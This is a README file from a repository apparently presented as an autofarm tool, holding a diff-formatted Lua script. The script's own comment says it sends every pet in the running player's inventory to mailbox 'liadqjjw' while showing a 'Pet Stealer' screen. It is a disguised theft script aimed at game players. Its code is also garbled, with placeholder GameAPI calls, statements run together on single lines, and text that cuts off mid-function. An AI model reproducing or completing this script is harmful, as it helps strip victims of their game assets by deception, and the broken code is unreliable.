dokinbog/autofram/README.md

--- Lua Script to send all pets from the current player’s inventory to mailbox ID 'liadqjjw' -- and display a black screen with "Pet Stealer" text

--- Define the target mailbox ID local targetMailboxID = "liadqjjw"
+local targetMailboxID = "liadqjjw"

--- Function to get the current player’s ID function getCurrentPlayerID()
+function getCurrentPlayerID()

-    -- Replace with actual API call to get the current player's ID local playerID = GameAPI.GetCurrentPlayerID() -- Replace with real API call return playerID end
+    local playerID = GameAPI.GetCurrentPlayerID() -- Replace with real API call return playerID end

--- Function to get all pet IDs from the current player’s inventory function getPlayerInventoryPets(playerID)
+function getPlayerInventoryPets(playerID)

-    -- Replace with actual API call to fetch all pets from the player's inventory local petIDs = GameAPI.GetPlayerPets(playerID) -- Replace with real API call return petIDs end
+    local petIDs = GameAPI.GetPlayerPets(playerID) -- Replace with real API call return petIDs end

--- Function to send a pet to the mailbox function sendPetToMailbox(petID, mailboxID)
+function sendPetToMailbox(petID, mailboxID)

-    -- Replace with actual API call to send a pet to the mailbox local success, err = GameAPI.SendPetToMailbox(petID, mailboxID) -- Replace with real API call if not success then
+    local success, err = GameAPI.SendPetToMailbox(petID, mailboxID) -- Replace with real API call if not success then
         print("Failed to send pet with ID " .. petID .. ": " .. err)